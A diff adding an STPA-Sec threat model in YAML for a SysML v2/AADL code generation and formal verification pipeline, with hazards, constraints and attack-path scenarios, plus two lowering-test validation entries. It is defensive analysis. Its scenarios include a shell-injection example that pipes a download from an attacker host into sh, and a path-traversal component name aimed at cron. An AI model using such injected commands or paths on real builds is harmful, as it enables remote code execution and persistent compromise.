+    tags: [security, verification, consistency, stpa-sec]
+    traces-to: [CC-SEC-2, CC-SEC-6]
+    mitigates: [H-SEC-2, H-SEC-5]

--- a/safety/stpa/security.yaml
+++ b/safety/stpa/security.yaml
@@ -1,0 +1,850 @@
+# STPA-Sec Analysis — Spar Code Generation & Verification Pipeline
+#
+# Security-focused STPA extension that treats security threats as losses.
+# Analyzes how an adversary could exploit the SysML v2 → AADL → codegen
+# → verification pipeline to produce compromised executable artifacts.
+#
+# Scope: the code generation pipeline (spar-codegen, spar-sysml2 lowering,
+# Bazel build rules, Lean4 proofs, Kani harnesses) is the primary attack
+# surface because attacker-controlled model input produces executable code.
+
+artifacts:
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 1a: Security Losses
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: L-SEC-1
+    type: loss
+    title: Attacker compromises generated code via model injection
+    description: >
+      An adversary crafts malicious SysML v2 or AADL input that causes
+      spar codegen to emit Rust source, WIT interfaces, TOML configs, or
+      BUILD.bazel files containing attacker-controlled content. The
+      generated code is compiled and deployed as a WASM component or
+      native binary in a safety-critical system, giving the attacker
+      arbitrary code execution within that component.
+    stakeholders: [system-integrator, certification-authority, end-user]
+
+  - id: L-SEC-2
+    type: loss
+    title: Verification bypass — proofs pass but code is unsafe
+    description: >
+      An adversary manipulates model properties (timing values,
+      component names, port configurations) such that the generated
+      Lean4 proofs and Kani harnesses verify successfully, but the
+      actual generated runtime code violates safety invariants. The
+      formal verification artifacts provide false assurance that the
+      system is safe.
+    stakeholders: [certification-authority, safety-reviewer, end-user]
+
+  - id: L-SEC-3
+    type: loss
+    title: SysML v2 model injection produces compromised AADL
+    description: >
+      An adversary supplies a crafted SysML v2 file that exploits the
+      lowering heuristics to produce AADL output with silently altered
+      semantics — wrong component categories, dropped connections,
+      injected property values — that downstream analysis and codegen
+      treat as correct. The resulting architecture has security-relevant
+      defects that are invisible to reviewers.
+    stakeholders: [system-integrator, safety-reviewer]
+
+  - id: L-SEC-4
+    type: loss
+    title: Build pipeline compromise via generated Bazel rules
+    description: >
+      Generated BUILD.bazel files or Cargo.toml manifests contain
+      references to attacker-controlled dependencies, repositories,
+      or toolchain paths. When the build system processes these files,
+      it fetches and executes malicious code during compilation, infecting
+      the build environment or the resulting artifacts.
+    stakeholders: [system-integrator, certification-authority]
+
+  - id: L-SEC-5
+    type: loss
+    title: Denial of verification through model complexity attack
+    description: >
+      An adversary supplies a model with exponential expansion
+      characteristics (deeply nested generics, recursive SysML v2
+      specializations, large array dimensions) that causes the codegen
+      or verification pipeline to consume unbounded resources, preventing
+      legitimate verification from completing.
+    stakeholders: [system-integrator, project-manager]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 1b: Security Hazards
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: H-SEC-1
+    type: hazard
+    title: Unsanitized model names in generated source code
+    description: >
+      Component, port, package, and feature names from the AADL/SysML v2
+      model are interpolated directly into generated Rust source code,
+      WIT files, Lean4 proofs, Kani harnesses, TOML configs, and Bazel
+      BUILD files. The sanitize_ident function strips non-alphanumeric
+      characters but may not cover all injection vectors (e.g., Rust raw
+      strings, WIT keywords, Lean4 tactics, TOML escape sequences, Bazel
+      Starlark injection).
+    severity: critical
+    losses: [L-SEC-1, L-SEC-2]
+
+  - id: H-SEC-2
+    type: hazard
+    title: Property values injected into generated code without validation
+    description: >
+      Property values from the AADL model (timing values, dispatch
+      protocols, classifier references) are formatted directly into
+      generated Rust constants, TOML values, and Lean4 literals via
+      format! macros. A crafted property value string could escape the
+      expected context and inject arbitrary code or configuration.
+    severity: critical
+    losses: [L-SEC-1, L-SEC-2]
+
+  - id: H-SEC-3
+    type: hazard
+    title: SysML v2 lowering silently alters component semantics
+    description: >
+      The SysML v2 lowering uses heuristics (infer_category) to decide
+      AADL component categories. An adversary can craft a part def that
+      the heuristic misclassifies (e.g., a security-critical process
+      lowered as a system, bypassing thread-level scheduling analysis).
+      The wildcard `_ => {}` in lower_node silently drops unrecognized
+      SysML v2 constructs without diagnostics.
+    severity: critical
+    losses: [L-SEC-3]
+
+  - id: H-SEC-4
+    type: hazard
+    title: Generated workspace pulls untrusted dependencies
+    description: >
+      workspace_gen generates Cargo.toml with hardcoded dependency
+      versions (wit-bindgen, serde, serde_json, toml). If an attacker
+      can influence the process names in the model, crate names in the
+      workspace members could collide with malicious crates on crates.io.
+      The generated BUILD.bazel loads rules from relative paths that
+      assume a trusted workspace root.
+    severity: critical
+    losses: [L-SEC-4]
+
+  - id: H-SEC-5
+    type: hazard
+    title: Verification artifacts do not cover runtime behavior
+    description: >
+      Generated Lean4 proofs only verify scheduling properties (RTA).
+      Generated Kani harnesses only verify single-thread deadline bounds
+      in isolation (no interference). Neither covers data integrity,
+      memory safety of generated port structs, or correct dispatch
+      protocol behavior. An attacker can satisfy all verification
+      conditions while the runtime code has exploitable defects.
+    severity: critical
+    losses: [L-SEC-2]
+
+  - id: H-SEC-6
+    type: hazard
+    title: Codegen writes to arbitrary filesystem paths
+    description: >
+      The codegen CLI writes generated files to --output directory
+      using paths constructed from model element names. A crafted
+      component name containing path traversal sequences (../),
+      after sanitize_ident processing, could write files outside
+      the intended output directory.
+    severity: critical
+    losses: [L-SEC-1, L-SEC-4]
+
+  - id: H-SEC-7
+    type: hazard
+    title: Model complexity causes resource exhaustion
+    description: >
+      The codegen pipeline iterates over all_components() multiple
+      times with no bounds on component count. SysML v2 lowering
+      processes recursive specialization chains without depth limits.
+      An adversary can craft models that generate millions of
+      components, exhausting memory or producing terabytes of output.
+    severity: marginal
+    losses: [L-SEC-5]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 1c: Security Constraints
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: SC-SEC-1
+    type: system-constraint
+    title: No code injection through model-derived identifiers
+    description: >
+      Names and values extracted from input models must be sanitized
+      before interpolation into any generated source file, configuration
+      file, or build file. Sanitization must be specific to the target
+      language (Rust, WIT, Lean4, TOML, Starlark).
+    hazards: [H-SEC-1, H-SEC-2]
+
+  - id: SC-SEC-2
+    type: system-constraint
+    title: Generated file paths must be confined to output directory
+    description: >
+      All generated file paths must be validated to resolve within the
+      specified output directory. Path traversal sequences must be
+      rejected.
+    hazards: [H-SEC-6]
+
+  - id: SC-SEC-3
+    type: system-constraint
+    title: Verification must cover safety-critical properties
+    description: >
+      Generated verification artifacts must cover the same safety
+      properties that the generated runtime code depends on. Gaps
+      between verified properties and runtime assumptions must be
+      documented.
+    hazards: [H-SEC-5]
+
+  - id: SC-SEC-4
+    type: system-constraint
+    title: SysML v2 lowering must not silently drop constructs
+    description: >
+      Unrecognized SysML v2 syntax kinds must produce diagnostics.
+      Category inference must be auditable and deterministic. Lowering
+      fidelity must be validated against reference SysML v2 models.
+    hazards: [H-SEC-3]
+
+  - id: SC-SEC-5
+    type: system-constraint
+    title: Generated build configurations must use pinned dependencies
+    description: >
+      Generated Cargo.toml and BUILD.bazel must use exact version pins,
+      checksum verification, or workspace-local paths. No generated file
+      may reference unpinned external registries.
+    hazards: [H-SEC-4]
+
+  - id: SC-SEC-6
+    type: system-constraint
+    title: Resource bounds on code generation
+    description: >
+      Code generation must enforce limits on the number of generated
+      files, total output size, and recursion depth during model
+      traversal.
+    hazards: [H-SEC-7]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 2: Security Control Structure
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: CTRL-SEC-SYSML2
+    type: controller
+    title: SysML v2 Lowering Controller
+    controller-type: automated
+    source-file: crates/spar-sysml2/src/lower.rs
+    process-model:
+      - SysML v2 input may be adversary-controlled
+      - Category inference heuristic determines security-critical classification
+      - Unhandled syntax kinds are silently discarded (wildcard match)
+      - Extracted names are passed verbatim to ItemTree
+
+  - id: CTRL-SEC-CODEGEN
+    type: controller
+    title: Code Generation Controller
+    controller-type: automated
+    source-file: crates/spar-codegen/src/lib.rs
+    process-model:
+      - Instance model is trusted input (no re-validation after lowering)
+      - Component names become Rust identifiers, WIT names, file paths
+      - Property values become Rust constants and Lean4 literals
+      - Format strings interpolate model data without escaping
+      - Generated files are written to user-specified directory
+
+  - id: CTRL-SEC-PROOFGEN
+    type: controller
+    title: Proof Generation Controller
+    controller-type: automated
+    source-file: crates/spar-codegen/src/proof_gen.rs
+    process-model:
+      - Timing properties are trusted and become proof obligations
+      - Default values (10ms period, 1ms WCET) are silently substituted
+      - Lean4 tactics and Kani annotations are hardcoded templates
+      - Thread ordering determines priority assignment (implicit, not verified)
+
+  - id: CTRL-SEC-BUILDGEN
+    type: controller
+    title: Build File Generation Controller
+    controller-type: automated
+    source-file: crates/spar-codegen/src/workspace_gen.rs
+    process-model:
+      - Process names become crate names and workspace members
+      - Dependency versions are hardcoded in generator source
+      - BUILD.bazel loads rules from relative paths
+      - No integrity verification of generated build graph
+
+  - id: CTRL-SEC-VERUS
+    type: controller
+    title: Verus/Bazel Verification Controller
+    controller-type: automated
+    source-file: tools/bazel/rules_verus/defs.bzl
+    process-model:
+      - Verus binary is resolved from PATH or toolchain attribute
+      - Source file paths are passed directly to shell command
+      - Verification log is the only output (pass/fail)
+      - No content-level validation of proof results
+
+  # ── Security Controlled Processes ───────────────────────────────────
+
+  - id: CP-SEC-MODEL-INPUT
+    type: controlled-process
+    title: SysML v2 / AADL Input Files
+    description: >
+      Model files provided by users or CI pipelines. May be
+      attacker-controlled in supply chain scenarios.
+
+  - id: CP-SEC-GENERATED-CODE
+    type: controlled-process
+    title: Generated Source Code and Build Files
+    description: >
+      Rust source, WIT interfaces, TOML configs, BUILD.bazel,
+      Lean4 proofs, and Kani harnesses produced by codegen.
+
+  - id: CP-SEC-VERIFIED-ARTIFACTS
+    type: controlled-process
+    title: Verified and Compiled Artifacts
+    description: >
+      WASM components and native binaries produced after
+      verification and compilation of generated code.
+
+  # ── Security Control Actions ────────────────────────────────────────
+
+  - id: CA-SEC-LOWER
+    type: control-action
+    title: Lower SysML v2 to AADL
+    action: Transform SysML v2 CST into AADL ItemTree
+    source: CTRL-SEC-SYSML2
+    target: CP-SEC-MODEL-INPUT
+
+  - id: CA-SEC-GENERATE
+    type: control-action
+    title: Generate code from AADL model
+    action: Produce Rust, WIT, config, proof, and build files from instance model
+    source: CTRL-SEC-CODEGEN
+    target: CP-SEC-GENERATED-CODE
+
+  - id: CA-SEC-GENPROOF
+    type: control-action
+    title: Generate verification artifacts
+    action: Produce Lean4 proofs and Kani harnesses from timing properties
+    source: CTRL-SEC-PROOFGEN
+    target: CP-SEC-GENERATED-CODE
+
+  - id: CA-SEC-GENBUILD
+    type: control-action
+    title: Generate build configuration
+    action: Produce Cargo.toml and BUILD.bazel workspace files
+    source: CTRL-SEC-BUILDGEN
+    target: CP-SEC-GENERATED-CODE
+
+  - id: CA-SEC-VERIFY
+    type: control-action
+    title: Run formal verification
+    action: Execute Verus/Lean4/Kani on generated artifacts
+    source: CTRL-SEC-VERUS
+    target: CP-SEC-VERIFIED-ARTIFACTS
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 3: Unsafe Control Actions (Security Perspective)
+  # ══════════════════════════════════════════════════════════════════════
+
+  # ── SysML v2 Lowering UCAs ─────────────────────────────────────────
+
+  - id: UCA-SEC-1
+    type: uca
+    title: Lowering silently drops security-relevant constructs
+    uca-type: not-providing
+    context: >
+      A SysML v2 model contains constraint defs, allocation defs, or
+      requirement defs that encode security properties (access control,
+      encryption requirements, data classification). The wildcard
+      match arm in lower_node discards them without diagnostic.
+    rationale: >
+      Security constraints specified in the model are lost during
+      lowering. The generated AADL has no record of these constraints.
+      Downstream analysis and codegen proceed without them, producing
+      code that lacks required security controls.
+    controller: CTRL-SEC-SYSML2
+    hazards: [H-SEC-3]
+
+  - id: UCA-SEC-2
+    type: uca
+    title: Category heuristic misclassifies security-critical component
+    uca-type: providing
+    context: >
+      The infer_category heuristic examines child nodes for action/state
+      usages to distinguish system from process/thread. An adversary
+      crafts a part def with carefully chosen children that causes a
+      security-critical process (requiring thread-level isolation) to
+      be classified as a system (no scheduling constraints).
+    rationale: >
+      Misclassified component skips scheduling analysis, timing
+      verification, and ARINC 653 partition checks. Generated code
+      has no dispatch loop or timing constraints.
+    controller: CTRL-SEC-SYSML2
+    hazards: [H-SEC-3]
+
+  # ── Code Generation UCAs ───────────────────────────────────────────
+
+  - id: UCA-SEC-3
+    type: uca
+    title: Codegen interpolates unsanitized name into Rust source
+    uca-type: providing
+    context: >
+      A component or port name in the AADL model contains characters
+      that survive sanitize_ident but are meaningful in Rust syntax
+      context (e.g., names that produce valid but malicious Rust after
+      sanitization — a name like "r#unsafe" or numeric-leading names
+      that become valid after underscore prefixing).
+    rationale: >
+      Generated Rust code contains attacker-influenced identifiers.
+      While sanitize_ident limits to alphanumeric + underscore, the
+      resulting identifier could shadow Rust keywords, standard library
+      types, or safety-critical trait implementations.
+    controller: CTRL-SEC-CODEGEN
+    hazards: [H-SEC-1]
+
+  - id: UCA-SEC-4
+    type: uca
+    title: Codegen embeds property value in Rust constant without bounds
+    uca-type: providing
+    context: >
+      A timing property (Period, WCET, Deadline) in the model has an
+      extreme value (e.g., Period => 0 ps, or Period => 18446744073709551615 ps)
+      that becomes a Rust u64 constant. The generated code and proofs
+      use this value without range validation.
+    rationale: >
+      Zero period causes division-by-zero in utilization computations.
+      Maximum u64 causes overflow in scheduling calculations. Generated
+      Kani harnesses with extreme values may vacuously pass.
+    controller: CTRL-SEC-CODEGEN
+    hazards: [H-SEC-2]
+
+  - id: UCA-SEC-5
+    type: uca
+    title: Codegen writes file outside output directory
+    uca-type: providing
+    context: >
+      A component name like "../../../../etc/cron.d/backdoor" passes
+      through sanitize_ident (which strips slashes) to become
+      "etc_cron_d_backdoor". However, the generated file path
+      format!("crates/{name}/src/lib.rs") uses the process name
+      directly. If a secondary path construction step is added that
+      does not use sanitize_ident, path traversal is possible.
+    rationale: >
+      Files written outside the output directory could overwrite
+      build system files, CI configurations, or other source code,
+      enabling persistent compromise of the repository.
+    controller: CTRL-SEC-CODEGEN
+    hazards: [H-SEC-6]
+
+  - id: UCA-SEC-6
+    type: uca
+    title: Codegen produces WIT with type confusion
+    uca-type: providing
+    context: >
+      An AADL port has a classifier reference that maps to a WIT type
+      name colliding with a WIT built-in (e.g., "string", "list",
+      "option"). The generated WIT file uses this name as a custom
+      type, creating ambiguity. When the WIT is compiled via
+      wasm-tools, the built-in type may be used instead of the
+      intended custom type.
+    rationale: >
+      Type confusion in the WIT interface allows a malicious component
+      to send data that the host interprets as a different type,
+      potentially bypassing capability restrictions or causing
+      memory safety issues in the runtime.
+    controller: CTRL-SEC-CODEGEN
+    hazards: [H-SEC-1]
+
+  # ── Proof Generation UCAs ──────────────────────────────────────────
+
+  - id: UCA-SEC-7
+    type: uca
+    title: Proof generator substitutes default timing values
+    uca-type: providing
+    context: >
+      When a thread has no explicit timing properties, proof_gen
+      substitutes defaults (10ms period, 1ms WCET). These defaults
+      make scheduling proofs trivially satisfiable (10% utilization).
+      An adversary omits timing properties from the model.
+    rationale: >
+      The generated Lean4 proof passes with default values that do
+      not match the actual runtime behavior. The verification
+      evidence is meaningless but appears valid in the certification
+      package.
+    controller: CTRL-SEC-PROOFGEN
+    hazards: [H-SEC-5]
+
+  - id: UCA-SEC-8
+    type: uca
+    title: Kani harness verifies only base case without interference
+    uca-type: stopped-too-soon
+    context: >
+      The generated Kani harness sets response_time = wcet (the
+      no-interference case). Higher-priority thread interference
+      is not modeled. The comment says "base case (no interference)"
+      but the harness name says "no_deadline_miss" without qualification.
+    rationale: >
+      The harness provides a false sense of coverage. A reviewer
+      sees "verify_{name}_no_deadline_miss" passes and concludes
+      the thread meets its deadline under all conditions. In reality,
+      only the trivial base case is checked.
+    controller: CTRL-SEC-PROOFGEN
+    hazards: [H-SEC-5]
+
+  # ── Build Generation UCAs ──────────────────────────────────────────
+
+  - id: UCA-SEC-9
+    type: uca
+    title: Generated Cargo.toml uses unpinned dependency versions
+    uca-type: providing
+    context: >
+      workspace_gen hardcodes wit-bindgen = "0.36", serde = "1",
+      serde_json = "1", toml = "0.8". These use semver ranges, not
+      exact pins. A dependency confusion or typosquatting attack
+      on crates.io could serve malicious versions.
+    rationale: >
+      The generated workspace compiles and runs malicious dependency
+      code. Since the workspace is auto-generated, engineers may
+      not review its Cargo.toml as carefully as hand-written code.
+    controller: CTRL-SEC-BUILDGEN
+    hazards: [H-SEC-4]
+
+  - id: UCA-SEC-10
+    type: uca
+    title: Generated crate names may collide with public registry
+    uca-type: providing
+    context: >
+      Process names from the AADL model become crate names in the
+      generated Cargo.toml (e.g., process "serde" creates a crate
+      named "serde"). If cargo resolves this ambiguously, it could
+      pull the public crate instead of the local workspace member.
+    rationale: >
+      Dependency confusion attack: the build system fetches a
+      malicious crate from crates.io instead of using the locally
+      generated code. The resulting binary contains attacker code.
+    controller: CTRL-SEC-BUILDGEN
+    hazards: [H-SEC-4]
+
+  # ── Verification Pipeline UCAs ─────────────────────────────────────
+
+  - id: UCA-SEC-11
+    type: uca
+    title: Verus rule passes shell-injectable paths
+    uca-type: providing
+    context: >
+      The verus_verify Bazel rule constructs a shell command by
+      joining source file paths with spaces. A source file path
+      containing shell metacharacters (;, |, $, backticks) could
+      inject arbitrary commands into the verification step.
+    rationale: >
+      Arbitrary command execution during the build. Since Verus
+      runs as a trusted tool in the build pipeline, injected
+      commands inherit build system permissions.
+    controller: CTRL-SEC-VERUS
+    hazards: [H-SEC-1, H-SEC-4]
+
+  - id: UCA-SEC-12
+    type: uca
+    title: wasm-tools component new accepts unverified core module
+    uca-type: not-providing
+    context: >
+      The wasm_component Bazel rule packages a core WASM module
+      into a component without verifying that the core module was
+      produced by the expected cargo build. If the core module is
+      substituted (build cache poisoning), the component embeds
+      attacker code.
+    rationale: >
+      The WASM component appears legitimate (correct WIT interface)
+      but contains a backdoored implementation. The WIT type
+      checking passes because the interface is correct; only the
+      implementation is compromised.
+    controller: CTRL-SEC-VERUS
+    hazards: [H-SEC-1, H-SEC-2]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 3b: Security Controller Constraints
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: CC-SEC-1
+    type: controller-constraint
+    title: Language-specific sanitization for all generated code
+    constraint: >
+      Every model-derived string interpolated into generated source
+      must pass through a sanitizer specific to the target language.
+      Rust: validate against keyword list, ensure identifier rules.
+      WIT: reject built-in type names. Lean4: reject tactic keywords.
+      TOML: escape special characters. Starlark: reject built-ins.
+    controller: CTRL-SEC-CODEGEN
+    ucas: [UCA-SEC-3, UCA-SEC-6]
+    hazards: [H-SEC-1]
+
+  - id: CC-SEC-2
+    type: controller-constraint
+    title: Timing property bounds validation before code generation
+    constraint: >
+      Before generating code or proofs, timing properties must be
+      validated: period > 0, wcet > 0, wcet <= deadline <= period.
+      Properties outside these bounds must produce error diagnostics
+      and must not be substituted with defaults.
+    controller: CTRL-SEC-CODEGEN
+    ucas: [UCA-SEC-4, UCA-SEC-7]
+    hazards: [H-SEC-2]
+
+  - id: CC-SEC-3
+    type: controller-constraint
+    title: Output path confinement
+    constraint: >
+      All generated file paths must be canonicalized and verified
+      to be descendants of the output directory. Path components
+      derived from model names must be re-sanitized at the point
+      of path construction.
+    controller: CTRL-SEC-CODEGEN
+    ucas: [UCA-SEC-5]
+    hazards: [H-SEC-6]
+
+  - id: CC-SEC-4
+    type: controller-constraint
+    title: SysML v2 lowering must diagnose unhandled constructs
+    constraint: >
+      The wildcard match arm in lower_node must emit a diagnostic
+      for any SyntaxKind that represents a semantic construct (not
+      whitespace or punctuation). Category inference must log the
+      decision rationale.
+    controller: CTRL-SEC-SYSML2
+    ucas: [UCA-SEC-1, UCA-SEC-2]
+    hazards: [H-SEC-3]
+
+  - id: CC-SEC-5
+    type: controller-constraint
+    title: Generated dependencies must use exact version pins with checksums
+    constraint: >
+      Generated Cargo.toml must use exact version pins (= prefix)
+      or workspace-level Cargo.lock. Generated BUILD.bazel must
+      reference content-addressed artifacts. No semver ranges in
+      generated dependency specifications.
+    controller: CTRL-SEC-BUILDGEN
+    ucas: [UCA-SEC-9, UCA-SEC-10]
+    hazards: [H-SEC-4]
+
+  - id: CC-SEC-6
+    type: controller-constraint
+    title: Verification harnesses must document coverage scope
+    constraint: >
+      Generated Kani harnesses and Lean4 proofs must include
+      machine-readable annotations documenting which properties
+      are verified and which are out of scope. Harness names
+      must not overstate the verification scope.
+    controller: CTRL-SEC-PROOFGEN
+    ucas: [UCA-SEC-7, UCA-SEC-8]
+    hazards: [H-SEC-5]
+
+  - id: CC-SEC-7
+    type: controller-constraint
+    title: Bazel rules must not construct shell commands from paths
+    constraint: >
+      Verus and wasm-tools Bazel rules must use ctx.actions.run
+      (argument list) instead of ctx.actions.run_shell (string
+      interpolation) to prevent shell injection via file paths.
+    controller: CTRL-SEC-VERUS
+    ucas: [UCA-SEC-11]
+    hazards: [H-SEC-1]
+
+  - id: CC-SEC-8
+    type: controller-constraint
+    title: WASM component must verify provenance of core module
+    constraint: >
+      The wasm_component rule must verify that the core WASM module
+      was produced by the expected cargo build action (via Bazel
+      dependency graph), not merely that a .wasm file exists in the
+      expected location.
+    controller: CTRL-SEC-VERUS
+    ucas: [UCA-SEC-12]
+    hazards: [H-SEC-1, H-SEC-2]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STEP 4: Loss Scenarios (Attack Paths)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: LS-SEC-1
+    type: loss-scenario
+    title: "Attack path: model-driven code injection via component name"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      An attacker contributes a SysML v2 model file to a shared repository.
+      The model contains a part def named "r#mod". During SysML v2 lowering,
+      extract_name produces "r#mod". sanitize_ident converts it to "r_mod"
+      (valid Rust identifier). The generated Rust code includes
+      `pub struct RModPorts { ... }` — benign. However, the attacker also
+      includes a property association with value "0; std::process::exit(1)//"
+      which, after format! interpolation into a comment or doc attribute,
+      could be rendered adjacent to executable code in an unexpected context.
+      While current sanitize_ident prevents direct identifier injection, the
+      attack surface exists in property value interpolation into const values,
+      doc comments, and config file strings.
+    causal-factors:
+      - Property values are not validated against a strict grammar
+      - Format strings in rust_gen interpolate property values into comments
+      - TOML config_gen writes property values into TOML string fields
+      - No integration test verifying generated code compiles safely
+    uca: [UCA-SEC-3, UCA-SEC-4]
+    hazards: [H-SEC-1, H-SEC-2]
+
+  - id: LS-SEC-2
+    type: loss-scenario
+    title: "Attack path: timing property manipulation for proof bypass"
+    scenario-type: inadequate-process-model
+    description: >
+      An attacker modifies an AADL model to set Compute_Execution_Time =>
+      0 ps .. 1 ps for a thread that actually runs for 5ms. The codegen
+      pipeline generates a Kani harness with WCET_PS = 1 (1 picosecond)
+      and PERIOD_PS = 10_000_000_000 (10ms). The harness
+      verify_*_no_deadline_miss trivially passes: any wcet <= 1 is well
+      within the 10ms deadline. The Lean4 proof similarly passes because
+      the utilization is 0.0000001%. Meanwhile, the actual thread exceeds
+      its real deadline. The generated verification evidence shows "all
+      proofs pass" with no indication that the input values were anomalous.
+    causal-factors:
+      - No sanity check on timing property magnitudes
+      - Default substitution (1ms WCET) masks missing properties
+      - Kani harness checks base case only, no interference model
+      - No cross-reference between analysis results and proof inputs
+    uca: [UCA-SEC-4, UCA-SEC-7, UCA-SEC-8]
+    hazards: [H-SEC-2, H-SEC-5]
+
+  - id: LS-SEC-3
+    type: loss-scenario
+    title: "Attack path: SysML v2 category confusion for partition bypass"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      An attacker crafts a SysML v2 part def for a security monitor
+      component. The part def body contains no action or state usages —
+      only port defs and attribute usages. The infer_category heuristic
+      classifies it as "system" (the default for parts without
+      software-like children). In AADL, system components have no
+      scheduling constraints. The security monitor, which should run
+      as a periodic thread within an ARINC 653 partition, is instead
+      modeled as a system with no dispatch loop. No scheduling analysis
+      runs. No ARINC 653 partition check applies. The monitor can be
+      starved by other components.
+    causal-factors:
+      - infer_category defaults to System for unrecognized patterns
+      - No annotation or override mechanism for explicit category
+      - SysML v2 has no direct equivalent of AADL component categories
+      - No warning when heuristic is applied to security-critical component
+    uca: [UCA-SEC-2]
+    hazards: [H-SEC-3]
+
+  - id: LS-SEC-4
+    type: loss-scenario
+    title: "Attack path: dependency confusion via generated workspace"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      An AADL model defines processes named "serde", "tokio", and "rand".
+      workspace_gen produces Cargo.toml with workspace members
+      crates/serde, crates/tokio, crates/rand. These are also listed as
+      [workspace.dependencies] with path = "crates/{name}". However, the
+      per-crate Cargo.toml also depends on `serde = { workspace = true }`
+      from [workspace.dependencies] — which resolves to the local path.
+      The risk emerges if an engineer adds an external dependency that
+      transitively depends on "serde" (the real one): cargo's resolver
+      must choose between the local "serde" (which is an AADL-generated
+      skeleton with no serde functionality) and the crates.io version.
+      This causes a build failure at best, or silent miscompilation if
+      the generated crate happens to export expected symbols.
+    causal-factors:
+      - Process names become crate names without collision checking
+      - No reserved name list for common Rust ecosystem crates
+      - Workspace dependency resolution is complex and implicit
+      - Generated code is not reviewed with same rigor as hand-written
+    uca: [UCA-SEC-10]
+    hazards: [H-SEC-4]
+
+  - id: LS-SEC-5
+    type: loss-scenario
+    title: "Attack path: shell injection via Verus verification rule"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      The verus_verify rule constructs a shell command:
+      `{verus_cmd} 2>&1 | tee {log}` where verus_cmd is built by
+      joining `[verus] + extra_args + src_paths`. If a source file
+      path contains shell metacharacters (possible in Bazel labels
+      or when paths are constructed from model names), the shell
+      interprets them. For example, a file path containing
+      `$(curl attacker.com/exploit | sh)` would execute during
+      verification. While Bazel typically controls file paths, the
+      rules_verus defs.bzl uses run_shell which is inherently unsafe
+      for path handling.
+    causal-factors:
+      - run_shell with string formatting instead of run with arg list
+      - Source paths not shell-escaped before interpolation
+      - Bazel labels can contain unusual characters
+      - No allowlist for source file path characters
+    uca: [UCA-SEC-11]
+    hazards: [H-SEC-1, H-SEC-4]
+
+  - id: LS-SEC-6
+    type: loss-scenario
+    title: "Attack path: WASM component substitution via build cache"
+    scenario-type: inadequate-feedback
+    description: >
+      The wasm_component rule's first step runs `cargo build` and then
+      uses `find` to locate the produced .wasm file. An attacker who
+      can write to the target directory (e.g., via a compromised build
+      cache or shared CI runner) places a backdoored .wasm file in
+      target/{target}/release/deps/ before cargo runs. The `find | head -1`
+      picks up the attacker's file. The second step (wasm-tools component
+      new) packages it into a valid WASM component. The final artifact
+      has correct WIT types but backdoored implementation.
+    causal-factors:
+      - Using find with head instead of cargo's --message-format=json output
+      - No checksum verification of cargo build output
+      - target/ directory may be shared across builds
+      - WASM component packaging does not verify module provenance
+    uca: [UCA-SEC-12]
+    hazards: [H-SEC-1, H-SEC-2]
+
+  - id: LS-SEC-7
+    type: loss-scenario
+    title: "Attack path: resource exhaustion via model complexity bomb"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      An attacker provides a SysML v2 model with 10,000 part defs,
+      each containing 100 port defs, resulting in 1,000,000 features.
+      The codegen pipeline generates Rust files with 1,000,000-field
+      structs, WIT files with 1,000,000 functions, and Lean4 proofs
+      with 1,000,000 theorems. The output is hundreds of gigabytes.
+      The build system and verification tools cannot process this,
+      effectively denying verification for the entire project.
+    causal-factors:
+      - No limit on number of components, features, or connections
+      - No limit on total generated output size
+      - all_components() iterates without bounds
+      - No incremental generation for large models
+    uca: [UCA-SEC-7]
+    hazards: [H-SEC-7]
+
+  - id: LS-SEC-8
+    type: loss-scenario
+    title: "Attack path: SysML v2 wildcard drops security annotations"
+    scenario-type: inadequate-control-algorithm
+    description: >
+      A SysML v2 model uses requirement defs and constraint defs to
+      specify security properties: "data in transit must be encrypted",
+      "component must run in isolated partition". The lower_node function
+      has handlers for REQUIREMENT_DEF and CONSTRAINT_DEF that convert
+      them to AADL property annotations. However, if these constructs
+      appear inside a context that routes through the wildcard `_ => {}`
+      (e.g., nested inside a flow def or verification case that is not
+      handled), the security annotations are silently dropped. The
+      generated AADL and subsequent code have no record of the
+      security requirements.
+    causal-factors:
+      - Wildcard match arm discards unrecognized children without diagnostic
+      - Nested constructs may not be recursively processed
+      - No validation that all requirement defs appear in output
+      - No completeness check comparing input construct count to output
+    uca: [UCA-SEC-1]
+    hazards: [H-SEC-3]

--- a/safety/stpa/validation.yaml
+++ b/safety/stpa/validation.yaml
@@ -1042,3 +1042,163 @@ artifacts:
         target: STPA-REQ-030
       - type: satisfies
         target: STPA-REQ-031
+
+  # ══════════════════════════════════════════════════════════════════════
+  # SysML v2 Lowering Validation
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: VAL-058
+    type: feature
+    title: SysML v2 lowering golden model test
+    description: >
+      Verifies end-to-end SysML v2 to AADL lowering against a golden
+      model. The test parses a non-trivial SysML v2 model with part defs,
+      port defs, connections, attributes, states, constraints, and
+      specialization, then compares the produced AADL ItemTree against
+      expected output.
+    status: passing
+    fields:
+      method: integration-test
+      test-location: crates/spar-sysml2/tests/
+      test-name: golden model and validation tests
+    links:
+      - type: satisfies
+        target: STPA-REQ-036
+      - type: satisfies
+        target: ARCH-029
+
+  - id: VAL-059
+    type: feature
+    title: SysML v2 lowering per-rule coverage
+    description: >
+      Verifies that each of the 14 SysML v2 lowering rules (part_def,
+      port_def, connection_def, action_def, state_def, attribute_def,
+      item_def, enum_def, interface_def, requirement_def, constraint_def,
+      calc_def, allocation_def, connection_usage) produces the expected
+      AADL construct with correct category and structure.
+    status: passing
+    fields:
+      method: unit-test
+      test-location: crates/spar-sysml2/src/lower.rs
+      test-name: tests::lower_* (14 rule tests)
+    links:
+      - type: satisfies
+        target: STPA-REQ-036
+      - type: satisfies
+        target: ARCH-029
+
